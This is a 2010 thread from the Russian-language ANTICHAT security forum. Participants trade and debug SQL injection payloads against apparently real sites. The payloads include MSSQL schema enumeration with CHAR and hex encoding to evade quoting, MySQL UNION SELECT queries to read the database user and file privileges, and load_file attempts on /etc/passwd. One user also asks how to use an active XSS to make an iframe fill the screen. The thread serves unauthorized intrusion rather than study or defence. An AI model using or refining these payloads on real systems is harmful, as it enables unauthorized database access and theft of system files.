ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.05.2010, 18:53
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от Konqi
ребят делаю запрос
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='tbl_group_admin')--
результат
Ligne 1 : syntaxe incorrecte vers ')'.
делаю
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=CHAR(116,98,108,95,103,11 4,111,117,112,95,97,100,109,105,110))--
результат
a fonction char requiert 1 arguments.
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=0x74626c5f67726f75705f616 46d696e)--
syntaxe incorrecte vers ')'
что посоветуете?
а если без топ 1 попробовать что выводит?
|
|
|
06.05.2010, 18:54
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от pinch
Есть сайт, делаю запрос:
http://test/news.php?id=-1+union+select+1,user(),3,4--
Выводит:
adeoo3@10.1.1.17
Хочу узнать права на чтение/запись файлов, делаю запрос:
http://test/news.php?id=-1+union+select+1,file_priv,3,4+from+mysql.user+whe re+user='adeoo3'--
Выводит:
SELECT command denied to user 'adeoo3'@'10.1.1.17' for table 'user'
Что это значит???
Нетдоступа к таблице майск.юсер, попробуй перечитапть файл через load_file или залить в /tmp и перечитать оттуда.
|
|
|
|
06.05.2010, 18:55
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
ребят делаю запрос (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='tbl_group_admin')-- результат Ligne 1 : syntaxe incorrecte vers ')'. делаю (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=CHAR(116,98,108,95,103,11 4,111,117,112,95,97,100,109,105,110))-- результат a fonction char requiert 1 arguments. (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=0x74626c5f67726f75705f616 46d696e)-- syntaxe incorrecte vers ')' что посоветуете?
надо так:
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--
|
|
|
|
06.05.2010, 19:00
|
|
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459
Репутация:
116
|
|
Есть активная xss. Как через яваскрипт сделать размер ифрейма на весь экран?
p.s. С помощью этого <iframe src=//сайт>
|
|
|
|
06.05.2010, 19:01
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
http://test/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4--
не катит.
Значит у меня однозначно нет прав?
Последний раз редактировалось pinch; 06.05.2010 в 19:05..
|
|
|
|
06.05.2010, 19:06
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от kfor
а если без топ 1 попробовать что выводит?
тот же результат
Сообщение от pinch
надо так:
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--
а можно без url encode?
Последний раз редактировалось Konqi; 06.05.2010 в 19:14..
|
|
|
|
06.05.2010, 19:13
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)+char(98)+char(1 08)+char(95)+char(103)+char(114)+char(111)+char(11 7)+char(112)+char(95)+char(97)+char(100)+char(109) +char(105)+char(110))--
|
|
|
|
06.05.2010, 19:15
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от pinch
http://test/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4--
не катит.
Значит у меня однозначно нет прав?
скорее всего да.
|
|
|
|
06.05.2010, 19:15
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
2 pinch
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= char(116)+char(98)+char(108)+char(95)+char(103)+ch ar(114)+char(111)+char(117)+char(112)+char(95)+cha r(97)+char(100)+char(109)+char(105)+char(110))--
syntaxe incorrecte vers 'char'.
|
|
|
|
06.05.2010, 19:18
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от pinch
http://test/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4--
не катит.
Значит у меня однозначно нет прав?
Попробуй
load_file(CHAR(47,101,116,99,47,112,97,115,115,119 ,100))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
